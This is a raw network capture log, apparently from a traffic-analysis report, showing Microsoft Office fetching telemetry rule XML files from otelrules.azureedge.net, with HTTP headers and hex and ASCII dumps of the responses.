                                                                                                                                            2024-10-31 16:13:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:17 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1368
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                            x-ms-request-id: 207ff7bf-701e-006f-1357-27afc4000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161317Z-15b8d89586fzhrwgk23ex2bvhw0000000ctg000000006m0h
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:17 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            108192.168.2.44986513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:17 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:17 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1401
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                            x-ms-request-id: 17a5a9a5-201e-0003-7b36-28f85a000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161317Z-15b8d89586f5s5nz3ffrgxn5ac0000000amg00000000297c
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:17 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            109192.168.2.44986613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:18 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:18 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1364
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                            x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161318Z-16849878b78g2m84h2v9sta29000000008mg00000000q5kg
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:18 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            110192.168.2.44986713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:18 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:18 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:18 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1397
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                            x-ms-request-id: 6035d9fd-201e-00aa-6710-2b3928000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161318Z-15b8d89586fmhjx6a8nf3qm53c00000003q0000000005ekm
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:18 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            111192.168.2.44986913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:18 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:18 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1403
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                            x-ms-request-id: 0df29f50-101e-005a-068d-27882b000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161318Z-16849878b78smng4k6nq15r6s40000000b9000000000dtue
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:18 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            112192.168.2.44986813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:18 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:18 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1360
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                            x-ms-request-id: 4f1f6d30-a01e-0070-1ae8-27573b000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161318Z-15b8d89586ffsjj9qb0gmb1stn0000000e1000000000595u
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:18 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            113192.168.2.44987013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:18 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:18 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:18 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1366
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                            x-ms-request-id: 16f71f95-f01e-0099-73fb-259171000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161318Z-16849878b78x6gn56mgecg60qc0000000bh000000000m26g
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:18 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            114192.168.2.44987113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:19 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:19 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:19 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1397
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                            x-ms-request-id: 3bd815fc-c01e-0066-6070-26a1ec000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161319Z-16849878b78qwx7pmw9x5fub1c00000007v000000000nshr
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:19 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            115192.168.2.44987213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:19 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:19 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1360
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                            x-ms-request-id: b8023838-801e-00a0-0cec-2a2196000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161319Z-15b8d89586fwzdd88qtcg4dr18000000020g00000000563h
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:19 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            116192.168.2.44987313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:19 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:19 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1427
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                            x-ms-request-id: ef425c1b-901e-002a-63e7-277a27000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161319Z-17c5cb586f6tg7hbbt0rp19dan00000001zg00000000hrrz
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
